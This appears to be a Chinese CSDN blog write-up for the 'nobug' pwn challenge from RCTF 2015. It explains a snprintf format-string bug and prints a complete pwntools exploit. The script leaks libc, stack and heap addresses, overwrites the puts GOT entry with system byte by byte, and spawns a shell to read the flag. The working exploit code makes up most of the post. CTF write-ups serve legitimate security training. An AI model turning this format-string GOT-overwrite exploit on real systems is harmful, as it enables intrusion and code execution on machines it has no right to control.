[XCTF-pwn] 33_rctf-2015_nobug

最新推荐文章于 2023-01-09 11:38:55 发布
最新推荐文章于 2023-01-09 11:38:55 发布
阅读量386 收藏 2
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/123381420
版权

格式化字符串漏洞 snprintf

程序先读入串,再用snprintf输出,由于snprintf有长度限制,每次只能一位一位的改。

int sub_8048B76()
{
  size_t v0; // eax
  const char *v1; // eax

  v0 = strlen(s);
  v1 = (const char *)sub_804869D(s, v0, 0);
  return snprintf(byte_804A8A0, 0x800u, "%s", v1);
}

思路:

  1. 先通过偏移打印出各部分加载地址
  2. 利用argv的ebp链在后部写got.puts的地址+1,+2,+3(argv的偏移是不固定的,需要在泄露地址后计算)
  3. 一次(4字节)写为system
  4. 发送/bin/sh

完成后看别人的exp,发现这个题栈可执行,直接将ebp+4将ret地址改为输入串指针(当作jmp)执行shellcode,在输入的时候先输入shellcode后边写ebp地址和数字。

完整exp:

from pwn import *
from base64 import b64encode

local = 1
if local == 1:
    p = process('./pwn')
else:
    p = remote('111.200.241.244', 63770) 
libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_i386/libc-2.23-i386-0ubuntu11.so')
one = [0x3a80c,0x3a80e,0x3a812,0x3a819,0x5f065,0x5f066]
offset_main_ret = 0x18637
elf = ELF('./pwn')
context(arch='i386', log_level='debug')

'''
0000| 0xfff41e70 --> 0x804a8a0 ("%29$x,%12$x,%9$x,")  #6
0012| 0xfff41e7c --> 0x83b0008 ("%29$x,%12$x,%9$x,")  #9
0024| 0xfff41e88 --> 0xfff41ea8 --> 0xfff41ec8 --> 0x0 #12
0092| 0xfff41ecc --> 0xf7d7c637 (<__libc_start_main+247>:	add    esp,0x10) #29
0100| 0xfff41ed4 --> 0xfff41f64 --> 0xfff4240b ("./pwn")   #31->69->792:xxx400
0104| 0xfff41ed8 --> 0xfff41f6c --> 0xfff42411 ("SHELL=/bin/bash") #32->71
'''

def add(msg):
    p.sendline(b64encode(msg))

gdb.attach(p, 'b*0x8048bc0')
pause()

add(b'%29$x,%12$x,%9$x,%31$x,')
libc_base = int(p.recvuntil(b',', drop=True), 16) - offset_main_ret
libc_elf.address = libc_base
stack_addr= int(p.recvuntil(b',', drop=True), 16) - 0x38 
heap_addr = int(p.recvuntil(b',', drop=True), 16)
print('libc:', hex(libc_base), 'stack#31:', hex(stack_addr))

#31->67->300
stack_67  = int(p.recvuntil(b',', drop=True), 16)
base_off = 6
base_67  = (stack_67 - stack_addr)//4+ base_off
print('#67:', base_67, hex(stack_67))

add(f'%{base_67}$x,'.encode())
stack_300 = int(p.recvuntil(b',', drop=True), 16) & 0xffffff00
base_300  = (stack_300 - stack_addr)//4+ base_off
print('#300:', base_300, hex(stack_300))


vv = p32(elf.got['puts'])+p32(elf.got['puts']+1)+p32(elf.got['puts']+2)+p32(elf.got['puts']+3)
for i in range(16):
   payload = b'A'*i + f'%31$hhn'.encode()
   add(payload)
   payload = f'%{vv[i]}c%{base_67}$hhn,,,'.encode()
   add(payload)
   p.recvuntil(b',,,')

ss = p32(libc_elf.sym['system'])
p0 = ss[0]
p1 = (0x100 + ss[1] - ss[0]) & 0xff
p2 = (0x100 + ss[2] - ss[1]) & 0xff
p3 = (0x100 + ss[3] - ss[2]) & 0xff
print(p0,p1,p2,p3, hex(libc_elf.sym['system']))
payload = f"%{p0}c%{base_300}$hhn%{p1}c%{base_300+1}$hhn%{p2}c%{base_300+2}$hhn%{p3}c%{base_300+3}$hhn;/bin/sh;#".encode()
add(payload)

add(b'/bin/sh\x00')

p.sendline(b'cat /flag')
p.interactive()

如果题的难度加大,堆栈设置不可执行就得回到这个解法了。

石氏是时试
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF 2021-10-4 Pwn
m0_56897090的博客
10-04 389
文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffer overflow 0分析EXPXCTF-Mary_Morton分析EXPEXPgift分析EXPfishin
XCTF-HW-pipeline附件
11-09
附件
RCTF-2015 nobug
doudoudedi
06-07 679
思路 有一个格式化字符串的漏洞 int sub_8048B32() { int v0; // eax const char *v1; // eax v0 = strlen(s); v1 = sub_804869D(s, v0, 0); return snprintf(byte_804A8A0, 0x800u, v1); } 题目没有开nx我们可以直接布置好shellcode然后跳过去观察栈发现一个地方可以利用 .text:08048BD7 sub
攻防世界PWN之Nobug题解
seaaseesa的博客
12-20 1302
Nobug 首先,检查一下程序的保护机制 PIE和NX没开,那么,我们可以轻松的布置shellcode到栈里或bss段或堆里,然后跳转。免去了泄露libc地址这些。 然后,我们用IDA分析一下 看似好像这里sprintf不存在漏洞,我们再看看其他函数 看见一个很复杂的函数,我们看看那个地址处是什么 是查表法,看起来像某种加密或解密算法,又由于不需要秘钥,我们推测可能是b...
RCTF-2015-notsequence WP
qq_41252520的博客
09-05 1421
前言 这道题目有多解,但是只有一组解是flag。再次提醒自己,搞逆向的数学一定要学好,至少大学之前的数学还能有印象! 分析 程序无花无壳,直接IDA反编译。 结构很清晰,分别来看这两个 check 函数。 通过测试可以得知这些 下标 的含义,如果我们用符号来作为输出,就会很清晰了: 然后这个函数检测的就是行 i 的数字之和 v3 = 2i。其实数学好的话,仅看这个函数就立马想到是 杨辉...
RCTF 2015 welpwn [ROP] [x64通用gadgets] [简单写法]
ACdream
01-26 369
https://blog.csdn.net/u011987514/article/details/70232881 按照自己习惯,代码重写一下: #!/usr/bin/env python # coding=utf-8 from pwn import * io = process("./welpwn") #gadgets p4r = 0x40089C pr = 0x4008A3 mai...
welpwn RCTF-2015 攻防世界
qq_41071646的博客
06-03 1628
参考链接 http://www.purpleroc.com/md/2015-11-17@RCTF-Writeup.html 这个题只是没有想到 找到这个点 然后 攻防世界 给的 so库也有问题 感觉 攻防世界的so环境都是 2.23的鸭 然后我就没有用DynELF 其实 可以在服务器看一下 地址 然后根据 后三位来判断是那个 只不过没有 DynELF 方便 思路就是 构造一个 ...
[XCTF-pwn] 10-welpwn-rctf-2015
weixin_52640415的博客
02-26 221
很久前的题,主程序里没有溢出,echo里遇0截断这里虽有溢出但也写不了rop,64们0太多了。 思路是,A*0x10+0这样会将rbp的尾部1字节置0,然后在payload尾部写rop,中间补ret int __cdecl main(int argc, const char **argv, const char **envp) { char buf[1024]; // [rsp+0h] [rbp-400h] BYREF write(1, "Welcome to RCTF\n", 0x10uL
Mary_Morton [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列17
重新启程
12-24 1521
题目地址:Mary_Morton 已经是高手进阶区的第六题了,每个题目都有不少收获,持之以恒! 先看看题目内容 很好,这是一道非常简单的热身pwn,当然,我是不会相信的!哈哈 大家应该注意到了,难度系数第一次>1星了,步入2星的阶段,最高是10星!期待一下 惯例先来检查安全机制 root@mypwn:/ctf/work/python/mary_morton# checksec ...
glibc 2.31 pwn——house of pig原题分析与示例程序
CoLin的pwn小屋
01-09 896
house of pig题目解析及演示程序
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-RE】新手练习区-no-strings-attached-解压密码:十三陵陈飞宇.rar
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/qffkcv
XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
教育科学规划项目中期检查报告书.docx
06-05
教育科学规划项目中期检查报告书.docx
中医药研发风险分担基金备案申报专家组评审表.docx
06-05
中医药研发风险分担基金备案申报专家组评审表.docx
eiq模型,19届新训练的
06-05
该分类模型采用了一种高效的架构,大大减少了模型参数和计算量,这使得它非常适合在移动和嵌入式设备上进行实时图像分类和检测。在速度与性能的平衡上,该模型通过使用深度可分离卷积来降低计算复杂度,同时保持或甚至提高分类的准确性。另外,MobileNetV2引入了反向残差结构,这种结构有助于提高模型的学习能力,同时减少参数数量。一个是残差连接: 帮助梯度在深层网络中传播,减少训练难度,提高准确性。一个是线性瓶颈: 在每个残差块的开始和结束使用线性激活函数,有助于模型学习更丰富的特征。其次,MobileNetV2通过在残差块中引入线性瓶颈和通道注意力机制,提高了模型的表达能力。最后在部署方面,由于MobileNetV2的设计考虑了在资源有限的设备上进行推理,因此它可以在不牺牲太多准确性的情况下,提供高资源利用率,同时由于其结构简单,MobileNetV2易于在各种硬件上进行部署,包括CPU、GPU和专用神经网络加速器。
mybatis-plus在idea中如何分页- 3.添加分页拦截器,4.分页mapper方法,5.自定义sql使用wrapper
最新发布
06-05
mybatis_plus在idea中如何分页- 3.添加分页拦截器+模糊查询, 4.分页mapper方法,5.自定义sql使用wrapper
pure_color xctf
07-16
pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值